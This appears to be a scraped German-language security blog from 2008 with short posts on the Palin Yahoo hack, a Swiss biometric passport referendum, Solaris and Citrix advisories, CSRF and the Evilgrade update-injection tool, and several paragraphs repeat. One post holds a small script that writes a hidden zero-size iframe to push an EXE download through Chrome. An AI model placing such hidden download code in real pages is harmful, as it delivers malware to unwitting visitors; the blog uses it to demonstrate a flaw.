Sarah Palin Yahoo Account hacked via Security Question
If only Sarah Palin would have read Securiteam Blogs and changed her security question, her Yahoo account woudn’t have been hijacked.
How about Yahoo!?
If only Yahoo! would stop their users from choosing stupid security questions, wouldn’t that help?
BTW, Did you change your security question?
How about Yahoo!?
If only Yahoo! would stop their users from choosing stupid security questions, wouldn’t that help?
BTW, Did you change your security question?
Referendum gegen Biometrische Schweizer Pässe
Seit ein paar Wochen schaue ich mir die Webseite von der "Piratenpartei Schweiz" an. Nun macht die virtuelle Partei auf ein Referendum aufmerksam, wo es um die Verhinderung für die Einführung des biometrischen Pass ab 2010 geht.
============== TEXT VON PIRATENPARTEI ===========
Gemäss dem Willen des Bundesrats und der Mehrheit des Parlaments sollen ab 1. März 2010 alle Schweizer Pässe und alle Schweizer Identitätskarten zwingend mit biometrischen Daten und einem RFID-Chip versehen werden. Zusätzlich sollen all diese Daten in einer zentralen Datenbank des Bundes gespeichert werden und ausländische Regierungen und private Unternehmungen sollen Zugriff auf diese persönlichen und vertraulichen Informationen der Schweizer Bürger erhalten. Auf www.freiheitskampagne.ch hat sich ein überparteiliches Referendumskomitee gefunden, um gegen diesen Entscheid vorzugehen.
============ ARGUMENTE DES KOMMITEE ================
Ein Bürger, der nicht bereit ist, sich vom Staat Fingerabdrücke und andere sensible persönliche Daten abnehmen und in einer zentralen Datenbank speichern zu lassen, wird in Zukunft nicht einmal mehr die Möglichkeit haben, eine Identitätskarte zu besitzen als Beweismittel seines Schweizer Bürgerrechts im Inland!
Links:
http://blog.stefanieloser.ch/politik-2/referendum-gegen-biometrische-schweizer-passe-und-identitatskarten/
http://www.freiheitskampagne.ch/
http://www.piraten-partei.ch/node/24
============== TEXT VON PIRATENPARTEI ===========
Gemäss dem Willen des Bundesrats und der Mehrheit des Parlaments sollen ab 1. März 2010 alle Schweizer Pässe und alle Schweizer Identitätskarten zwingend mit biometrischen Daten und einem RFID-Chip versehen werden. Zusätzlich sollen all diese Daten in einer zentralen Datenbank des Bundes gespeichert werden und ausländische Regierungen und private Unternehmungen sollen Zugriff auf diese persönlichen und vertraulichen Informationen der Schweizer Bürger erhalten. Auf www.freiheitskampagne.ch hat sich ein überparteiliches Referendumskomitee gefunden, um gegen diesen Entscheid vorzugehen.
============ ARGUMENTE DES KOMMITEE ================
Ein Bürger, der nicht bereit ist, sich vom Staat Fingerabdrücke und andere sensible persönliche Daten abnehmen und in einer zentralen Datenbank speichern zu lassen, wird in Zukunft nicht einmal mehr die Möglichkeit haben, eine Identitätskarte zu besitzen als Beweismittel seines Schweizer Bürgerrechts im Inland!
Bereits 2003 und 2006 wurden jeweils neue Schweizer Pässe eingeführt. Der Bundesrat begründet die Notwendigkeit eines neuen “Passes 2010″ mit dem Schengen-Abkommen. Doch dort ist keine Rede davon, dass die Daten in einer zentralen Datenbank gespeichert werden müssten! Es ist dort auch keine Rede davon, dass nebst dem Pass zusätzlich biometrische Identitätskarten erstellt werden müssten!
Bis am 2.10.2008 braucht es 50′000 Unterschriften, damit ein Referendum zustande kommt und eine Volksabstimmung über diese Sache erwirken zu können.Links:
http://blog.stefanieloser.ch/politik-2/referendum-gegen-biometrische-schweizer-passe-und-identitatskarten/
http://www.freiheitskampagne.ch/
http://www.piraten-partei.ch/node/24
Web Application Statistik 2007
Heute habe ich das vom Web Application Security Statistics Project erstellte Statistik PDF gelesen. Darin werden Trends im Web App Bereich aufgezeigt. Die Statistik zeigt, dass mehr als 7% der Webseiten automatisch angegriffen werden können. Zudem wird aufgezeigt, dass XSS und SQLi die grösste Anzahl von Schwachstellen ausmacht. Der Bericht scheint mir sehr interessant, wenn auch nicht wirklich unerwartet für Leute in diesem Business. Trotzdem werden wir die schönen Graphiken sicherlich ab und zu in einem Management Summary antreffen.
Gruss Ivan
Gruss Ivan
Google Chrome - Exe Downloader
Was macht Google Chrome Browser bei Links auf EXE Files?
Siehe unten...
<script>
document.write('<iframe
src="http://www.example.com/hello.exe"
frameborder="0" width="0" height="0">');
</script>
Wenn man eine Webseite mit diesem Inhalt anwählt mit
Google Chrome, dann lädt der Google Browser das EXE
ungefragt auf den PC.
Hmmm...Security lässt grüssen
Neuer Google Browser - und bereits eine Schwachstelle
Am Dienstag 2. September 2008 hat Google den hauseigenen Browser vorgestellt und heute, einen Tag später ist bereits eine Vulnerability draussen, die den Browser zum abstürzen bringt. Habs ausprobiert, funktioniert wirklich.
Siehe auch http://evilfingers.com/advisory/google_chrome_poc.php
Zu Beginn sieht der Google Browser super aus, kann ohne Local Admin Privs installiert werden und hat eingebaute Features wie JavaScript Debugger etc. Die Rendering Engine basiert auf der gleichen wie Safari. Der Browser erscheint mir auf den ersten Blick recht flott.
Bin gespannt, wie sich die Sache weiterentwickelt. Habe im Moment unter meinem Windows schon viele Browser zum "testen"
a) IE
b) Firefox
c) Safari für Windows
d) Operae
e) Google Chrome
.... bin gespannt.
Siehe auch http://evilfingers.com/advisory/google_chrome_poc.php
Zu Beginn sieht der Google Browser super aus, kann ohne Local Admin Privs installiert werden und hat eingebaute Features wie JavaScript Debugger etc. Die Rendering Engine basiert auf der gleichen wie Safari. Der Browser erscheint mir auf den ersten Blick recht flott.
Bin gespannt, wie sich die Sache weiterentwickelt. Habe im Moment unter meinem Windows schon viele Browser zum "testen"
a) IE
b) Firefox
c) Safari für Windows
d) Operae
e) Google Chrome
.... bin gespannt.
Wie kann man aus einer Solaris10 Zone ausbrechen?
Solaris Vulnerability - Patchen notwendig.
The kernel in Sun Solaris 8 through 10 and OpenSolaris before snv_90 allows local users to bypass chroot, zones, and the Solaris Trusted Extensions multi-level security policy, and establish a covert communication channel, via unspecified vectors involving system calls.
http://sunsolve.sun.com/search/document.do?assetkey=1-26-240706-1
The kernel in Sun Solaris 8 through 10 and OpenSolaris before snv_90 allows local users to bypass chroot, zones, and the Solaris Trusted Extensions multi-level security policy, and establish a covert communication channel, via unspecified vectors involving system calls.
http://sunsolve.sun.com/search/document.do?assetkey=1-26-240706-1
Dan Kaminsky DNS Problem -> Citrix auch betroffen
Das von Dan Kaminsky identifizierte DNS Problem macht nun die zweite Runde, indem jeder DNS Query Dienst analysiert wird. Citrix Access Gateway ist so ein Dienst, der die Source DNS Ports nicht randomisiert.
=============== INFO =============
Citrix has acknowledged a vulnerability in Access Gateway, which can be exploited by malicious people to poison the DNS cache.
The vulnerability is caused due to Access Gateway not sufficiently randomising the DNS query port number, which can be exploited to poison the DNS cache.
The vulnerability is reported in all versions of the Access Gateway Standard and Advanced Edition appliance firmware up to and including v 4.5.7 Rev A.
http://secunia.com/advisories/31594/
=============== INFO =============
Citrix has acknowledged a vulnerability in Access Gateway, which can be exploited by malicious people to poison the DNS cache.
The vulnerability is caused due to Access Gateway not sufficiently randomising the DNS query port number, which can be exploited to poison the DNS cache.
The vulnerability is reported in all versions of the Access Gateway Standard and Advanced Edition appliance firmware up to and including v 4.5.7 Rev A.
http://secunia.com/advisories/31594/
Leute wie Aaron erhalten mehr Spam als Zorro
Richard Clayton von der Universtität Cambridge hat eine Studie verfasst die besagt, dass Personen mit Buchstaben aus dem Begin des Alphabet (Aaron) mehr Spam kriegen als solche, die den Buchstaben weit hinten haben (Zorro).
PDF Link
Artikel Newspaper:
Richard Clyton Homepage
Nette Geschichte...
PDF Link
Artikel Newspaper:
Richard Clyton Homepage
Nette Geschichte...
Cross Site Request Forgery - TheRegister
Was ist Cross Site Request Forgery? Eine gute und einfache Erklärung habe ich heute auf TheRegister gelesen.
http://www.theregister.co.uk/2008/08/29/hijacked_browser/
http://www.theregister.co.uk/2008/08/29/hijacked_browser/
Bundes Trojaner - Evil Upgrades
An der Blackhat 2008 wurde ein Verfahren vorgestellt, wie man die Computer von Bürgern mit Bundestrojanern "ausrüsten" kann mit dem Ziel, den Suspect zu überwachen. Ein neues Tool mit dem Namen "Evil Upgrade" erlaubt diese Methode nun auch für "Hacker". Es verlangt jedoch, dass der Verkehr des Suspect vorab mit einer MitM Attacke umgelenkt werden kann.
http://www.darknet.org.uk/2008/08/isr-evilgrade-inject-updates-to-exploit-software/
Die Software verfolgt einen modularen Ansatz, so dass rasch von einer grösseren Unterstützung von Update Mechanismen gerechnet werden muss. Im Moment kann das Tool folgende Update Mechanismen nutzen für die Installation von Trojanern.
http://www.darknet.org.uk/2008/08/isr-evilgrade-inject-updates-to-exploit-software/
Die Software verfolgt einen modularen Ansatz, so dass rasch von einer grösseren Unterstützung von Update Mechanismen gerechnet werden muss. Im Moment kann das Tool folgende Update Mechanismen nutzen für die Installation von Trojanern.
- Java plugin
- Winzip
- Winamp
- MacOS
- OpenOffice
- iTunes
- Linkedin Toolbar
- DAP [Download Accelerator]
- Notepad++